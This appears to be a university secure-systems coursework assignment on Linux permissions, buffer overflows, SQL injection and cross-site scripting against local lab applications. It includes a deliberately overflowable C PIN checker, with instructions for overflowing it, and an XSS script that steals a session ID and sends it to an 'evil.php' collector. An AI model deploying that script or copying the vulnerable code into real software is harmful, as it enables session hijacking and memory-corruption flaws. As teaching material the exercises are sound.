COMM047 Secure Systems and Applications Assignment

Reference no: EM132851542

COMM047 Secure Systems and Applications - University of Surrey

Exercise 1: Access Control

Access Control Matrices, Lists and Capability lists

For this exercise you will need to have access to a standard Linux VM image like the COMM047-VM (Ubuntu 20.04) one available in OpenNebula.

cd into the standard /tmp directory under Ubuntu. You might find the following commands useful:

sudo, useradd, groupadd, usermod, mkdir, chown, chmod, touch and nano or vi. Use the man command to find out more about them, e.g. man mkdir. Within /tmp:

- Create 2 users (usera, userb) and 2 groups (COMM047 and InfoSec).
- Create a file called FileA.txt which usera owns and can read. The group owner of the file is COMM047, which has write access to the file. No-one else has been granted any other access rights.
- Create a shell script called helloB with the following content:
#!/bin/sh
echo "Hello B!"
The script is owned by userb, who as the owner has read and execute rights. The group owner of that file is InfoSec and has only been given execute access. No-one else has been granted any other access rights.
- Make usera a member of both the COMM047 and InfoSec groups, while userb should be a member of the InfoSec group only and not of COMM047.
- Create a directory called ex1 owned by the system root user, who has full access rights to it. The group owner of ex1 is COMM047 and has been given read and execute permission on the directory. No-one else has been granted any other access rights.

a) Open a terminal and execute:
cd /tmp
sudo ls -al ex1 FileA.txt helloB && groups usera userb
Include a screenshot of the output of the command.

b) Ignoring the /tmp directory, who are the subjects and what are the objects in the above scenario?

c) Draw the access control matrix for usera, userb, ex1, FileA.txt and helloB.

d) From within their Ubuntu home directories (/home/usera and /home/userb respectively), usera and userb both execute /tmp/helloB.

What happens and why?

e) Both users now execute: echo "hello">>/tmp/FileA.txt
What happens and why?

Multilevel Security - Integrity
Research the Clark-Wilson and Brewer-Nash security models. You can find the original papers, "A Comparison of Commercial and Military Computer Security Policies" by Clark and Wilson and "The Chinese Wall Security Policy" by Brewer and Nash, in the Papers folder of the Coursework.zip file.

a) Provide a brief (0.5 to 1 page) overview of what the security models try to achieve and how they differ from or improve upon the Bell-LaPadula and Biba models.

b) You must use IEEE referencing when citing your sources!

Mandatory Access Control
Linux has two popular approaches to provide MAC: SELinux and AppArmor.

a) Describe how they differ from the standard UNIX file permissions.

b) Give a simple example of an AppArmor MAC policy that demonstrates how it operates.

c) In your opinion, which approach (SELinux vs AppArmor) is better and why? You might want to touch upon the usability, complexity and security provided by each framework.

(Note that there is no right or wrong answer, only a well or poorly reasoned one.)

Role-based Access Control

a) Summarize the main advantages of role-based access control.

b) Draw the access matrix corresponding to the RBAC policy depicted in the figure below, where permissions p1, p2, p3 are (object, access-right) pairs defined as follows: p1 = (Appointment, Create); p2 = (RecentMedicalRecords, View & Update; OldMedicalRecord, View); p3 = (OldMedicalRecord, View & Delete).

Unix Access Control

a) What is the setuid bit?

b) Why is it necessary for some files to be setuid root (i.e., owned by root with the setuid bit set)?

c) What security problems may a setuid root program cause?

Exercise 2: Software Vulnerabilities

Briefly answer the following questions

a) What is a heap overflow?

b) Give THREE approaches, with a short description of how each works, that allow programmers to minimise the risk of buffer-overflow exploits.

c) Explain what is meant by format string problems.

d) Giving reasons, what would your top 5 recommendations be to ensure that your software developers increase the security of their code?

Consider the following C program, validate_Pin.c (you can find it in the Code folder of the Coursework.zip file):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]){
    char pin[3];
    char ok = 'N';

    if (argc<2){
        printf("Please enter your PIN \n");
        exit(0);
    }

    strcpy(pin, argv[1]);
    if (strcmp(pin,"123")!=0){
        printf ("Wrong Pin \n");
    }else{
        printf ("Correct Pin \n");
        ok = 'Y';
    }

    if(ok=='Y'){
        printf ("You can now withdraw money!\n");
    }
    return 0;
}

Compile the program as follows on the COMM047-BufferOverflow-VM (note this is one command, not two!):

gcc -fno-stack-protector validate_pin.c -ggdb -o validate_pin_no_stack_protection

a) What is the expected output if the user provides the PIN "123" ?

b) What is the expected output if the user does not provide any input?

c) Run the program and start by entering "000" (three 0s) and then keep increasing the number of 0s one by one. What happens and why?

d) Run the program and start by entering "YYY" (three Ys) and then keep increasing the number of Ys one by one. What happens and why?

e) Recompile the program with stack protection enabled: gcc -fstack-protector validate_pin.c -ggdb -o validate_pin_withProtection
Re-run step d). What happens and why?
Hint: check the stack layout of the protected and non-protected programs.

f) Change the line char pin[3]; to char pin[4]; and recompile the code using:
gcc validate_pin.c -ggdb -o validate_pin4_withProtection
and rerun step e). What happens now and why?

Buffer-overflow via scanf
Given the C function
int scanf ( const char * format, ... );
declared in the header file stdio.h (#include <stdio.h>), write a simple C program that contains a buffer-overflow vulnerability due to the use of scanf, and explain why the program is vulnerable and how you would fix it.

(Hint: you can use scanf to read a string from stdin and store it in the array of chars buff as follows: scanf("%s", buff);)
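Added example, not the coursework's validate_pin.c: a hardened replacement for both the strcpy()-based PIN check above and the unbounded scanf("%s", buff) read in the hint. The PIN value "123" and the three-digit length are taken from the exercise; the buffer sizes and function names are my own.

```c
/* Hardened PIN check: added example, not the coursework's validate_pin.c.
 * That program copies argv[1] into char pin[3] with strcpy(), so any PIN of
 * three or more characters (even "123", which needs a fourth byte for the NUL)
 * writes past the array into whatever the compiler placed next to it. */
#include <stdio.h>
#include <string.h>

#define PIN_LEN 3                /* digits in a valid PIN */
#define PIN_BUF (PIN_LEN + 1)    /* one extra byte for the terminating NUL */

/* Returns 1 for the correct PIN, 0 otherwise; never writes outside pin[]. */
int validate_pin(const char *input)
{
    char pin[PIN_BUF];
    size_t n = 0;
    if (input == NULL)
        return 0;
    /* bounded scan: never walk further than PIN_BUF bytes, then reject any
     * input that is not exactly PIN_LEN long before a single byte is copied */
    while (n < PIN_BUF && input[n] != '\0')
        n++;
    if (n != PIN_LEN)
        return 0;
    memcpy(pin, input, n);
    pin[n] = '\0';
    return strcmp(pin, "123") == 0;
}

/* Bounded line reader, the safe replacement for scanf("%s", buff): fgets()
 * writes at most bufsz-1 bytes plus the NUL. Returns 1 with the newline
 * stripped, or 0 (buffer cleared, rest of the line drained) if it did not fit. */
int read_pin_line(char *buf, size_t bufsz, FILE *in)
{
    if (fgets(buf, (int)bufsz, in) == NULL)
        return 0;
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n' || n < bufsz - 1) {   /* whole line fitted */
        buf[n] = '\0';
        return 1;
    }
    for (int c; (c = getc(in)) != EOF && c != '\n'; )
        ;                                     /* discard the overflowed tail */
    buf[0] = '\0';
    return 0;
}
```

A main() would read into char buf[PIN_BUF + 1] (PIN, newline, NUL) with read_pin_line and then call validate_pin; an over-long "YYYY..." line is refused before it can reach any neighbouring variable.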

Exercise 3: Web Attacks

Briefly answer the following questions
a) Investigate the following SQL injection attack described in:

What was the vulnerability and how was it fixed? Looking at the fix, is there an alternative approach that could have been used in the way ExponentCMS handles SQL queries?

b) "Client-side validation is too insecure. You only need to check your data on the server." Give reasons why you agree or disagree with this statement.

Web exploits
Please also download the Coursework.zip file to the COMM047-VM and extract it.
Open a terminal and install php-sqlite:

sudo apt install php-sqlite3

Now cd to the Web directory that you extracted from the Coursework.zip file. Inside that folder execute the following command in the terminal:

php -S localhost:8000

This will start a standalone PHP server. Open Firefox and enter the URL:

If your sqlite is installed properly, the first 2 lines on that page should show something like this:
Array ([versionString]=>3.22.0 [versionNumber]=>30220000 7.2.24-0ubuntu0.18.04.6

If it doesn't then please check the terminal in which you started the standalone php server for any error messages.

a) Login.php: Navigate to
The Login.php file should produce the following form:

This form collects data and sends it to itself to verify the username and password. Investigate the code and decide whether or not it suffers from a SQL injection vulnerability.

Explain your reasoning.

b) Investigate the source code for CheckSession.php. What is the purpose of this code and why is functionality like this required by web applications?

c) Changing your name...: Log in as Alice (password Al1c3) and look at your accounts and messages. Right-click on the MainMenu.php page and select Inspect Element (Q):
Find the form fields associated with the My Account Details button and change the username value attribute from Alice to Peter:

Submit the form by clicking on the My Accounts Details button. What happens and why?

d) Extracting information: Using the principles from Step c), find out the account details of someone else. Explain how you achieved this.

e) Fixing the issue: How do you propose to fix this problem? Describe and explain your solution.

Hint: You probably only want the session id to be posted around...

Cross-site scripting

Messages.php is vulnerable to an XSS attack. Can you find the vulnerability and exploit it to steal another user's session ID and send it to evil.php (check what it does...)? Describe how you would carry out the attack and how it can be prevented.

Hint: Log in as Alice and try to send yourself the following message: Hi Alice! <script type="text/javascript">alert('XSS works!');</script>

You might also find the following piece of code useful:

<script type="text/javascript">
try {
    var x = document.getElementsByName("sessionid")[0].value;
    var request = new XMLHttpRequest();
    request.open("GET", "https://localhost:8000/evil.php?s_id=" + x, true);
    request.send();
} catch (err) {}
</script>

Exercise 4: Limits of Antivirus software?

Read the following paper: "The big four - What we did wrong in Advanced Persistent Threat detection?" by Nikos Virvilis and Dimitris Gritzalis. (You can find it in the Papers folder of the Coursework.zip file.)

a) Provide a brief (~1 page) summary of the paper and discuss the limits of Antivirus Software in the light of its findings. Do you think that Antivirus Software still has a role in protecting PCs?

b) You must use IEEE referencing when citing your sources!

